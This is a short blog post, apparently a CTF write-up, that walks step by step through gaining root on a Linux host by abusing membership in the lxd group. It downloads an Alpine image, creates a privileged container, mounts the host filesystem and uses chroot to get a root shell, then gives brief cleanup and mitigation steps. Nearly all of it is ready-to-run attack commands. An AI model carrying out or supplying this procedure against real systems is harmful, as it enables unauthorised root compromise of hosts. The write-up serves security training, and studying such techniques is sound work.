Post

LXD or PWNBOX

Posted
By 2br007
2 min read
LXD or PWNBOX

pwn

Intro

LXD PwnBox is a privilege escalation technique that exploits the LXD container management system on Linux. If a user has been added to the lxd group, they can create and run privileged containers, effectively gaining root access on the host. By mounting the host filesystem inside a container, an attacker can read or modify critical system files. This method is commonly used in CTFs and penetration tests when LXD is misconfigured. 🚀

Enumeration

Here we will talk about situation when you are already inside of the machine

  • Lets Check id in terminal:
1
2
3
4

id

# result (pay attention you are in lxd group!):
uid=1000(kingkong) gid=1000(kingkong) groups=1000(kingkong),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
  • If you see your user in lxd

    Weaponization/Privilege Escalation

  • Prepare a home for the future container:
1

mkdir /tmp/lxd && cd /tmp/lxd
  • Download Alpine LXD tar file to it’s new home from github or use cli:
    1

    wget https://github.com/saghul/lxd-alpine-builder/raw/refs/heads/master/alpine-v3.13-x86_64-20210218_0139.tar.gz -O alpine-v3.18-x86_64.tar.gz
  • Once the tar file is ready, import it into LXD:
1

lxc image import alpine-v3.18-x86_64.tar.gz --alias myimage
  • Verify the image has been added:
1

lxc image list
  • Create a new privileged LXD container with the imported Alpine image:
1

lxc init myimage pwnbox -c security.privileged=true
  • !NBIf you get Error: No storage pool found. Please create a new storage pool just create a storage pool like this (if no error faced just skip this step)
1

lxc init myimage pwnbox -s mypool -c security.privileged=true
  • Give the container full access to the host’s file system:
1

lxc config device add pwnbox mydevice disk source=/ path=/mnt/root recursive=true
  • Start the container:
1

lxc start pwnbox
  • Confirm it’s running:
1

lxc list
  • Now, enter the container:
1

lxc exec pwnbox /bin/sh
  • Since the container is privileged and has access to the host’s filesystem, navigate to /mnt/root to access the main system:
1
2

cd /mnt/root
ls -la
  • Now became root:
1

chroot /mnt/root /bin/bash

You’re root! 🎉

Cleanup (If Needed)

  • To remove the container after exploitation:
1
2

lxc delete pwnbox --force
lxc image delete myimage

Mitigation

  • Remove users from the lxd group:
1

sudo gpasswd -d kingkong lxd
  • Restrict LXD container permissions:
1

lxc config set core.https_address ""
  • Use AppArmor or SELinux to sandbox LXD properly.
thm, hacking, linux
ctf sudo privilege escalation lxd bash pwnbox
This post is licensed under CC BY 4.0 by the author.